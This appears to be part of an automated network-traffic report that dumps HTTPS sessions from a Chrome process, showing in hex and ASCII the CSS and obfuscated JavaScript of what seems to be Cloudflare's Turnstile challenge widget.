                                                      2024-03-05 13:23:18 UTC1369INData Raw: 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 72 6f 62 6f 74 6f 2c 20 6f 78 79 67 65 6e 2c 20 75 62 75 6e 74 75 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 31 36 70 78 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 32 35 3b 0a 20 20 63 6f 6c 6f 72 3a 20
                                                      Data Ascii: nt, "Segoe UI", roboto, oxygen, ubuntu, "Helvetica Neue", arial, sans-serif; font-size: 14px; font-weight: 400; -webkit-font-smoothing: antialiased; font-style: normal;}h1 { margin: 16px 0; text-align: center; line-height: 1.25; color:
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 74 68 3a 20 36 70 78 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 7d 0a 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 2e 70 31 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 32 34 32 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 32 34 32 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 74 72 6f 6b 65 20 30 2e 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 35 2c 20 30 2c 20 30 2e 34 35 2c 20 31 29 20 66 6f 72 77 61 72 64 73 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 30 2e 35 73 3b 0a 7d 0a 0a
                                                      Data Ascii: th: 6px; stroke: #f8f8f8; stroke-miterlimit: 10;}#success-icon .p1 { stroke-dasharray: 242; stroke-dashoffset: 242; box-shadow: inset 0 0 0 #038127; animation: stroke 0.4s cubic-bezier(0.65, 0, 0.45, 1) forwards; animation-delay: 0.5s;}
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 6d 61 72 6b 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 61 63 74 69 76 65 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 66 62 61 64 34 31 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 64 36 64 36 64 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62
                                                      Data Ascii: 22;}.theme-dark .ctp-checkbox-label input:focus ~ .mark, .theme-dark .ctp-checkbox-label input:active ~ .mark { border: 2px solid #fbad41;}.theme-dark .ctp-checkbox-label input:checked ~ .mark { background-color: #6d6d6d;}.theme-dark .ctp-checkb
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d
                                                      Data Ascii: per-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited, .theme-dark #fr-helper-link:link,.theme-dark #fr-helper-loop-link:visited,.theme-dark #fr-helper-loop-link:link { color: #bbb;}.theme-dark #fr-helper-link:active, .theme-dark #fr-
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 20 61 3a 66 6f 63 75 73 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 36 36 33 37 39 3b 0a 7d 0a 0a 23 6c 6f 67 6f 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 36 70 78 3b 0a 7d 0a 0a 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 31 36 36 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 31 36 36 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69
                                                      Data Ascii: a:focus,#challenge-error-text a:active,#challenge-error-text a:hover,#challenge-error-text a:focus { color: #166379;}#logo { margin-bottom: 1px; height: 26px;}.failure-circle { stroke-dasharray: 166; stroke-dashoffset: 166; stroke-wi
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 3a 3a 61 66 74 65 72 20 7b 0a 20 20 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6c 65 66 74 3a 20 38 70 78 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 62 6f 72 64 65 72 3a 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 30 20 34 70 78 20 34 70 78 20 30 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 32 70 78 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 2e 6d 61 72 6b 20 7b 0a 20 20 70 6f 73
                                                      Data Ascii: }.ctp-checkbox-label input:checked ~ .mark::after { top: 3px; left: 8px; transform: rotate(45deg) scale(1); border: solid #c44d0e; border-width: 0 4px 4px 0; border-radius: 0; width: 6px; height: 12px;}.ctp-checkbox-label .mark { pos
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 71 72 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 70 78 3b 0a 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 66 61 69 6c 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77
                                                      Data Ascii: g-right: 0; text-align: right;}.size-compact #terms { text-align: right;}.size-compact #qr { text-align: center;}.size-compact #challenge-error-title { margin-top: 3px; width: auto;}.size-compact #fail { display: flex; flex-flow: row
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 66 61 69 6c 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 73 70 69 6e 6e 65 72 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 72 74 6c 20 2e 63 74 70 2d 63 68
                                                      Data Ascii: ss-icon { left: 86px;}.rtl .size-compact #fail-icon { left: 86px;}.rtl .size-compact #spinner-icon { left: 86px;}.rtl .size-compact #expired-icon { left: 86px;}.rtl .size-compact #expired { margin-top: 0; margin-left: 0;}.rtl .ctp-ch


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.449750104.17.2.1844434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:18 UTC711OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=85fa6b76cf6e4369 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:18 UTC335INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:18 GMT
                                                      Content-Type: application/javascript; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6b79f8474303-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:18 UTC1034INData Raw: 37 65 36 33 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 6b 2c 66 7a 2c 66 41 2c 66 42 2c 66 48 2c 66 4a 2c 66 4b 2c 66 4c 2c 66 4d 2c 66 4e 2c 66 4f 2c 66 50 2c 66 51 2c 66 52 2c 66 53 2c 66 54 2c 66 55 2c 66 56 2c 66 57 2c 66 58 2c 66 59 2c 66 5a 2c 67 30 2c 67 31 2c 67 32 2c 67 33 2c 67 34 2c 67 35 2c 67 36 2c 67 37 2c 67 38 2c 67 39 2c 67 61 2c 67 62 2c 67 63 2c 67 64 2c 67 65 2c 67 66 2c 67 67 2c 67 68 2c 67 69 2c 67 6a 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 41 2c 67 4f 2c 68 31 2c 68 36 2c 68 37 2c 68 6a 2c 68 73 2c 68 77 2c 68 78 2c 68 42 2c 68 43 2c 69 36 2c 69 61 2c
                                                      Data Ascii: 7e63window._cf_chl_opt.uaO=false;~function(ik,fz,fA,fB,fH,fJ,fK,fL,fM,fN,fO,fP,fQ,fR,fS,fT,fU,fV,fW,fX,fY,fZ,g0,g1,g2,g3,g4,g5,g6,g7,g8,g9,ga,gb,gc,gd,ge,gf,gg,gh,gi,gj,gk,gl,gm,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gA,gO,h1,h6,h7,hj,hs,hw,hx,hB,hC,i6,ia,
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 31 35 33 34 29 5d 28 53 74 72 69 6e 67 5b 69 6c 28 32 32 34 34 29 5d 28 68 5b 69 6c 28 31 39 38 36 29 5d 28 68 5b 69 6c 28 31 34 38 39 29 5d 28 32 35 35 2e 39 37 26 6d 2c 6a 29 2d 69 25 36 35 35 33 35 2c 36 35 35 33 35 29 25 32 35 35 29 29 29 3b 72 65 74 75 72 6e 20 6b 5b 69 6c 28 34 39 30 29 5d 28 27 27 29 7d 2c 66 7a 5b 69 6b 28 31 33 33 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 69 41 2c 65 2c 69 2c 6a 2c 6d 29 7b 65 3d 28 69 41 3d 69 6b 2c 7b 27 71 62 5a 5a 61 27 3a 69 41 28 32 33 38 38 29 2c 27 72 59 52 71 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 7d 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 65 5b 69 41 28 31 32 32 36 29 5d 28 66 45 2c 63 29 7d 63 61 74 63 68 28 67 29 7b 69 66 28 69 41 28 37 39 34 29 21 3d
                                                      Data Ascii: 1534)](String[il(2244)](h[il(1986)](h[il(1489)](255.97&m,j)-i%65535,65535)%255)));return k[il(490)]('')},fz[ik(1332)]=function(c,iA,e,i,j,m){e=(iA=ik,{'qbZZa':iA(2388),'rYRqm':function(g,h){return g(h)}});try{return e[iA(1226)](fE,c)}catch(g){if(iA(794)!=
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 44 28 31 30 39 35 29 5d 3f 27 68 2f 27 2b 66 7a 5b 69 44 28 31 30 38 31 29 5d 5b 69 44 28 31 30 39 35 29 5d 2b 27 2f 27 3a 27 27 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 73 3d 6a 5b 69 44 28 32 31 37 39 29 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 42 3d 28 78 3d 7b 7d 2c 78 5b 69 44 28 34 33 31 29 5d 3d 66 2c 78 2e 63 63 3d 67 2c 78 5b 69 44 28 35 30 35 29 5d 3d 43 2c 4a 53 4f 4e 5b 69 44 28 31 33 34 35 29 5d 28 78 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 6e 5b 69 44 28 31 35 33 39 29 5d 28 6a 5b 69 44 28 31 30 38 35 29 5d 28 27 76 5f 27 2b 66 7a 5b 69 44 28 31 30 38 31 29 5d 5b 69 44 28 31 36 34 39 29 5d 2b 27 3d 27 2c 6d 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 38 27 3a 43 3d 68 7c 7c 69 44 28 36
                                                      Data Ascii: D(1095)]?'h/'+fz[iD(1081)][iD(1095)]+'/':'';continue;case'5':s=j[iD(2179)];continue;case'6':B=(x={},x[iD(431)]=f,x.cc=g,x[iD(505)]=C,JSON[iD(1345)](x));continue;case'7':n[iD(1539)](j[iD(1085)]('v_'+fz[iD(1081)][iD(1649)]+'=',m));continue;case'8':C=h||iD(6
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 72 6e 20 6d 2a 6c 7d 2c 27 4f 73 75 72 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 62 70 62 4e 51 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6d 21 3d 6c 7d 2c 27 63 6c 74 42 52 27 3a 69 4a 28 35 35 38 29 2c 27 44 4f 79 66 70 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 2c 27 4d 71 4e 74 75 27 3a 69 4a 28 39 39 36 29 2c 27 6b 63 58 74 78 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 21 3d 6d 7d 2c 27 54 45 48 4f 59 27 3a 69 4a 28 32 33 30 31 29 2c 27 74 6e 59 63 73 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 2c 27 79 43 49 72 42 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65
                                                      Data Ascii: rn m*l},'Osuro':function(l,m){return l+m},'bpbNQ':function(l,m){return m!=l},'cltBR':iJ(558),'DOyfp':function(l,m){return l(m)},'MqNtu':iJ(996),'kcXtx':function(l,m){return l!=m},'TEHOY':iJ(2301),'tnYcs':function(l,m){return l(m)},'yCIrB':function(l,m){re
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 32 30 30 26 26 66 5b 69 4d 28 32 30 31 36 29 5d 28 69 5b 69 4d 28 32 33 33 30 29 5d 2c 33 30 34 29 29 72 65 74 75 72 6e 20 76 6f 69 64 20 68 28 29 3b 28 73 3d 66 42 28 69 5b 69 4d 28 32 30 31 38 29 5d 29 2c 73 5b 69 4d 28 34 35 36 29 5d 28 66 5b 69 4d 28 32 34 32 35 29 5d 29 29 3f 6e 65 77 20 66 7a 5b 28 69 4d 28 37 30 31 29 29 5d 28 73 29 28 64 29 3a 28 76 3d 66 5b 69 4d 28 31 34 34 39 29 5d 28 68 5a 2c 73 29 2c 66 5b 69 4d 28 31 39 36 33 29 5d 28 74 79 70 65 6f 66 20 76 2c 66 5b 69 4d 28 31 34 33 39 29 5d 29 26 26 76 28 64 29 29 7d 2c 6b 3d 69 69 5b 69 4a 28 32 33 35 38 29 5d 28 4a 53 4f 4e 5b 69 4a 28 31 33 34 35 29 5d 28 64 29 29 5b 69 4a 28 39 32 32 29 5d 28 27 2b 27 2c 69 4a 28 34 39 34 29 29 2c 69 5b 69 4a 28 31 35 33 39 29 5d 28 27 76 5f 27 2b 66
                                                      Data Ascii: 200&&f[iM(2016)](i[iM(2330)],304))return void h();(s=fB(i[iM(2018)]),s[iM(456)](f[iM(2425)]))?new fz[(iM(701))](s)(d):(v=f[iM(1449)](hZ,s),f[iM(1963)](typeof v,f[iM(1439)])&&v(d))},k=ii[iJ(2358)](JSON[iJ(1345)](d))[iJ(922)]('+',iJ(494)),i[iJ(1539)]('v_'+f
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 28 36 37 38 29 2c 66 4b 5b 69 6b 28 31 31 38 39 29 5d 3d 69 6b 28 31 37 33 36 29 2c 66 4b 5b 69 6b 28 31 39 33 38 29 5d 3d 69 6b 28 32 30 37 37 29 2c 66 4b 5b 69 6b 28 31 38 37 35 29 5d 3d 69 6b 28 31 38 37 36 29 2c 66 4b 5b 69 6b 28 32 34 33 36 29 5d 3d 69 6b 28 31 38 35 38 29 2c 66 4b 5b 69 6b 28 31 36 32 30 29 5d 3d 69 6b 28 31 31 31 36 29 2c 66 4c 3d 7b 7d 2c 66 4c 5b 69 6b 28 32 33 30 39 29 5d 3d 69 6b 28 31 37 35 31 29 2c 66 4c 5b 69 6b 28 38 34 36 29 5d 3d 69 6b 28 31 30 34 35 29 2c 66 4c 5b 69 6b 28 31 37 39 34 29 5d 3d 69 6b 28 31 39 33 32 29 2c 66 4c 5b 69 6b 28 38 33 38 29 5d 3d 69 6b 28 31 38 37 34 29 2c 66 4c 5b 69 6b 28 39 32 30 29 5d 3d 69 6b 28 31 33 31 33 29 2c 66 4c 5b 69 6b 28 31 30 37 35 29 5d 3d 69 6b 28 31 39 34 36 29 2c 66 4c 5b 69
                                                      Data Ascii: (678),fK[ik(1189)]=ik(1736),fK[ik(1938)]=ik(2077),fK[ik(1875)]=ik(1876),fK[ik(2436)]=ik(1858),fK[ik(1620)]=ik(1116),fL={},fL[ik(2309)]=ik(1751),fL[ik(846)]=ik(1045),fL[ik(1794)]=ik(1932),fL[ik(838)]=ik(1874),fL[ik(920)]=ik(1313),fL[ik(1075)]=ik(1946),fL[i
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 66 4d 5b 69 6b 28 31 32 34 32 29 5d 3d 69 6b 28 31 35 37 31 29 2c 66 4d 5b 69 6b 28 39 38 32 29 5d 3d 69 6b 28 31 33 36 35 29 2c 66 4d 5b 69 6b 28 31 31 38 39 29 5d 3d 69 6b 28 31 39 36 34 29 2c 66 4d 5b 69 6b 28 37 36 30 29 5d 3d 69 6b 28 32 31 37 35 29 2c 66 4d 5b 69 6b 28 31 39 33 38 29 5d 3d 69 6b 28 32 34 31 38 29 2c 66 4d 5b 69 6b 28 31 38 37 35 29 5d 3d 69 6b 28 32 30 36 34 29 2c 66 4d 5b 69 6b 28 32 34 33 36 29 5d 3d 69 6b 28 37 38 38 29 2c 66 4d 5b 69 6b 28 31 36 32 30 29 5d 3d 69 6b 28 35 39 35 29 2c 66 4d 5b 69 6b 28 31 36 38 39 29 5d 3d 69 6b 28 31 33 31 30 29 2c 66 4d 5b 69 6b 28 31 36 30 35 29 5d 3d 69 6b 28 35 37 36 29 2c 66 4d 5b 69 6b 28 31 37 33 34 29 5d 3d 69 6b 28 38 37 33 29 2c 66 4d 5b 69 6b 28 31 38 35 35 29 5d 3d 69 6b 28 36 37 33
                                                      Data Ascii: fM[ik(1242)]=ik(1571),fM[ik(982)]=ik(1365),fM[ik(1189)]=ik(1964),fM[ik(760)]=ik(2175),fM[ik(1938)]=ik(2418),fM[ik(1875)]=ik(2064),fM[ik(2436)]=ik(788),fM[ik(1620)]=ik(595),fM[ik(1689)]=ik(1310),fM[ik(1605)]=ik(576),fM[ik(1734)]=ik(873),fM[ik(1855)]=ik(673
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 3d 69 6b 28 31 35 36 32 29 2c 66 4f 5b 69 6b 28 32 32 39 35 29 5d 3d 69 6b 28 31 34 35 37 29 2c 66 4f 5b 69 6b 28 32 32 34 37 29 5d 3d 69 6b 28 36 35 37 29 2c 66 4f 5b 69 6b 28 31 38 38 37 29 5d 3d 69 6b 28 32 31 35 32 29 2c 66 4f 5b 69 6b 28 39 34 32 29 5d 3d 69 6b 28 31 31 34 30 29 2c 66 4f 5b 69 6b 28 31 36 38 31 29 5d 3d 69 6b 28 32 31 31 36 29 2c 66 4f 5b 69 6b 28 35 39 37 29 5d 3d 69 6b 28 32 30 31 33 29 2c 66 4f 5b 69 6b 28 37 38 32 29 5d 3d 69 6b 28 31 30 33 38 29 2c 66 4f 5b 69 6b 28 31 39 39 31 29 5d 3d 69 6b 28 31 36 35 37 29 2c 66 4f 5b 69 6b 28 36 33 38 29 5d 3d 69 6b 28 31 35 30 34 29 2c 66 4f 5b 69 6b 28 31 34 33 32 29 5d 3d 69 6b 28 32 32 36 35 29 2c 66 4f 5b 69 6b 28 32 32 33 30 29 5d 3d 69 6b 28 38 38 35 29 2c 66 4f 5b 69 6b 28 38 39 30
                                                      Data Ascii: =ik(1562),fO[ik(2295)]=ik(1457),fO[ik(2247)]=ik(657),fO[ik(1887)]=ik(2152),fO[ik(942)]=ik(1140),fO[ik(1681)]=ik(2116),fO[ik(597)]=ik(2013),fO[ik(782)]=ik(1038),fO[ik(1991)]=ik(1657),fO[ik(638)]=ik(1504),fO[ik(1432)]=ik(2265),fO[ik(2230)]=ik(885),fO[ik(890
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 66 51 5b 69 6b 28 31 34 33 32 29 5d 3d 69 6b 28 31 32 38 32 29 2c 66 51 5b 69 6b 28 32 32 33 30 29 5d 3d 69 6b 28 32 30 34 39 29 2c 66 51 5b 69 6b 28 38 39 30 29 5d 3d 69 6b 28 31 36 30 34 29 2c 66 51 5b 69 6b 28 31 39 34 39 29 5d 3d 69 6b 28 34 34 36 29 2c 66 51 5b 69 6b 28 31 34 32 39 29 5d 3d 69 6b 28 36 30 39 29 2c 66 51 5b 69 6b 28 31 32 34 32 29 5d 3d 69 6b 28 31 34 32 36 29 2c 66 51 5b 69 6b 28 39 38 32 29 5d 3d 69 6b 28 31 32 35 30 29 2c 66 51 5b 69 6b 28 31 31 38 39 29 5d 3d 69 6b 28 32 34 33 39 29 2c 66 51 5b 69 6b 28 31 39 33 38 29 5d 3d 69 6b 28 32 33 34 37 29 2c 66 51 5b 69 6b 28 31 38 37 35 29 5d 3d 69 6b 28 34 37 30 29 2c 66 51 5b 69 6b 28 32 34 33 36 29 5d 3d 69 6b 28 32 30 36 36 29 2c 66 51 5b 69 6b 28 31 36 32 30 29 5d 3d 69 6b 28 34 33
                                                      Data Ascii: fQ[ik(1432)]=ik(1282),fQ[ik(2230)]=ik(2049),fQ[ik(890)]=ik(1604),fQ[ik(1949)]=ik(446),fQ[ik(1429)]=ik(609),fQ[ik(1242)]=ik(1426),fQ[ik(982)]=ik(1250),fQ[ik(1189)]=ik(2439),fQ[ik(1938)]=ik(2347),fQ[ik(1875)]=ik(470),fQ[ik(2436)]=ik(2066),fQ[ik(1620)]=ik(43
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 28 31 38 37 35 29 5d 3d 69 6b 28 32 33 32 34 29 2c 66 53 5b 69 6b 28 32 34 33 36 29 5d 3d 69 6b 28 32 33 36 39 29 2c 66 53 5b 69 6b 28 31 36 32 30 29 5d 3d 69 6b 28 32 30 34 34 29 2c 66 54 3d 7b 7d 2c 66 54 5b 69 6b 28 32 33 30 39 29 5d 3d 69 6b 28 31 37 31 35 29 2c 66 54 5b 69 6b 28 38 34 36 29 5d 3d 69 6b 28 31 31 38 30 29 2c 66 54 5b 69 6b 28 31 37 39 34 29 5d 3d 69 6b 28 31 34 34 32 29 2c 66 54 5b 69 6b 28 38 33 38 29 5d 3d 69 6b 28 37 30 37 29 2c 66 54 5b 69 6b 28 39 32 30 29 5d 3d 69 6b 28 31 36 34 38 29 2c 66 54 5b 69 6b 28 31 30 37 35 29 5d 3d 69 6b 28 31 31 36 38 29 2c 66 54 5b 69 6b 28 32 32 39 35 29 5d 3d 69 6b 28 31 33 34 32 29 2c 66 54 5b 69 6b 28 32 32 34 37 29 5d 3d 69 6b 28 32 32 33 33 29 2c 66 54 5b 69 6b 28 31 38 38 37 29 5d 3d 69 6b 28
